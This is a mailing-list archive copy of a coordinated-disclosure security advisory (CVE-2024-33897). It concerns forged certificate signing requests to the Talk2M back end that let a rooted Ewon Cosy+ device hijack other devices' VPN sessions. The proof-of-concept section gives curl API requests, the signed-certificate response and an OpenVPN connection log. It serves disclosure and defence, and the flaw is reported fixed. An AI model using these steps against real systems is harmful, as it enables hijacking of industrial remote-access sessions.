lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <76b2593a-4551-4bfc-9d46-100b566bcf1c@syss.de>
Date: Sun, 11 Aug 2024 19:49:16 +0200
From: Moritz Abrell via Fulldisclosure <fulldisclosure@...lists.org>
To: <fulldisclosure@...lists.org>
Subject: [FD] Improper Authentication (CWE-287) CVE-2024-33897

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-043
Product:                   Ewon Cosy+ / Talk2M Remote Access Solution
Manufacturer:              HMS Industrial Networks AB
Affected Version(s):       N.A.
Tested Version(s):         N.A.
Vulnerability Type:        Improper Authentication (CWE-287)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2024-04-17
Solution Date:             2024-04-18
Public Disclosure:         2024-08-11
CVE Reference:             CVE-2024-33897
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between
the machine (PLC, HMI, or other devices) and the remote engineer.
The connection happens through Talk2m, a highly secured industrial
cloud service. The Ewon Cosy+ makes industrial remote access easy
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

During account assignment in the Talk2M platform, a Cosy+ device
generates and sends a certificate signing request (CSR) to the back end.
This CSR is then signed by the manufacturer and used for OpenVPN
authentication by the device afterward.

Since the common name (CN) of the certificate is specified by the device
and used in order to assign the OpenVPN session to the corresponding
Talk2M account, an attacker with root access to a Cosy+ device is able
to manipulate the CSR and get correctly signed certificates for foreign
devices.

Using these certificates for OpenVPN authentication results in hijacking
the VPN session and allows for further attacks, e.g.:

- - Impacting the accessibility of the original device
- - Attacking the Talk2M-connected user device via the VPN connection
- - Eavesdropping and manipulating the network communication of connected
   users

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Note: Since the X.509 client certificate of a Cosy+, which is used for
       authentication against the Talk2M API, is handled by the hardware
       security module (HSM), root access to a Cosy+ device is required.


1. Exporting the OpenSSL engine to use the hardware security module:
    
    $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf
    $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0


2. Sending a self-created CSR to the Talk2M API:
  
    $ curl --path-as-is -i -s -k -X $'POST' \
     -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \
     -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \
     -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \
     --data-binary $'{\x0a\x09\"csr\":
         \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY
         xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U
         EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt
         zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI
         1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE
         GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\
         nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX
         aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO
         4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu
         6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi
         PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW
         vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT
         E REQUEST-----\\n\"\x0a}' \
     $'https://eu.device.talk2m.com/certificates/csr' \
     --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem


3. Requesting the signed certificate:
     
     $ curl -i -k -H $'Device-State: AccountLinked' \
     https://device.talk2m.com/certificates/deviceCertificate  \
     --cert birth_key_crt.pem --key birth_key_ref.pem


4. Talk2M response:
     
     HTTP/1.1 200
     date: Tue, 16 Apr 2024 13:09:57 GMT
     server: Apache
     ewon-server-time: 1713272998
     device-state: VpnProvisioned
     content-type: application/json
     transfer-encoding: chunked
     
     {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]
     KsxyR8w==\n-----END CERTIFICATE-----"}


5. This signed certificate and the used key can be used for OpenVPN
    authentication. The CN will be used to assign the session to the
    corresponding Talk2M account. This also overwrites a potential
    current VPN session of the original device:

     $ openvpn --config attacker.ovpn
       Attempting to establish TCP connection with [AF_INET]51.195.79.69:443
       TCP connection established with [AF_INET]51.195.79.69:443
       TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443
       VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,
         OU=Talk2M, CN=Talk2M Certification Authority,
         emailAddress=itmanager@...k2m.com
       VERIFY KU OK
       Validating certificate extended key usage
       ++ Certificate has EKU (str) TLS Web Server Authentication,
         expects TLS Web Server Authentication
       VERIFY EKU OK
       VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,
         O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,
         emailAddress=info@...n.biz
       Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,
         peer certificate: 2048 bit RSA, signature: RSA-SHA1
       [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443
       TUN/TAP device tap0 opened
       net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0
       TUN/TAP link layer address set to 00:03:27:d8:68:84
       net_iface_mtu_set: mtu 1500 for tap0
       net_iface_up: set tap0 up
       net_addr_v4_add: 10.37.211.214/16 dev tap0
       Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'
       Timers: ping 10, ping-exit 40
       Initialization Sequence Completed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability was fixed in the back end by HMS on April 18, 2024.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-09: Potential vulnerability discovered
2024-04-16: Call with the manufacturer and requested a Talk2M account
             with an assigned device to verify the potential vulnerability
2024-04-16: Manufacturer provided a Talk2M account with an assigned device
2024-04-16: Vulnerability confirmed
2024-04-16: Short update about the state sent to the manufacturer
2024-04-16: Security advisory inculding technical details provided to
             the manufacturer
2024-04-18: Vulnerability fixed by the manufacturer
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer
2024-07-12: Manufacturer asked for reviewing the blog post draft
2024-07-12: Confirmed reviewing the blog post is possible and asking for
             the sending of details
2024-07-17: Blog post provided to HMS
2024-07-23: Inquiry about the status
2024-07-23: Manufacturer reviewed the blog post
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post
2024-07-29: Discussion with HMS about the blog post and final publication
             actions
2024-08-11: Vulnerability disclosed at DEF CON[7]
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-043
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt
[3] SySS Responsible Disclosure Policy
     https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf
[5] CVE-2024-33897
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897
[6] Blog post
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@...s.de
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=
=JS3w
-----END PGP SIGNATURE-----


Download attachment "smime.p7s" of type "application/pkcs7-signature" (4706 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ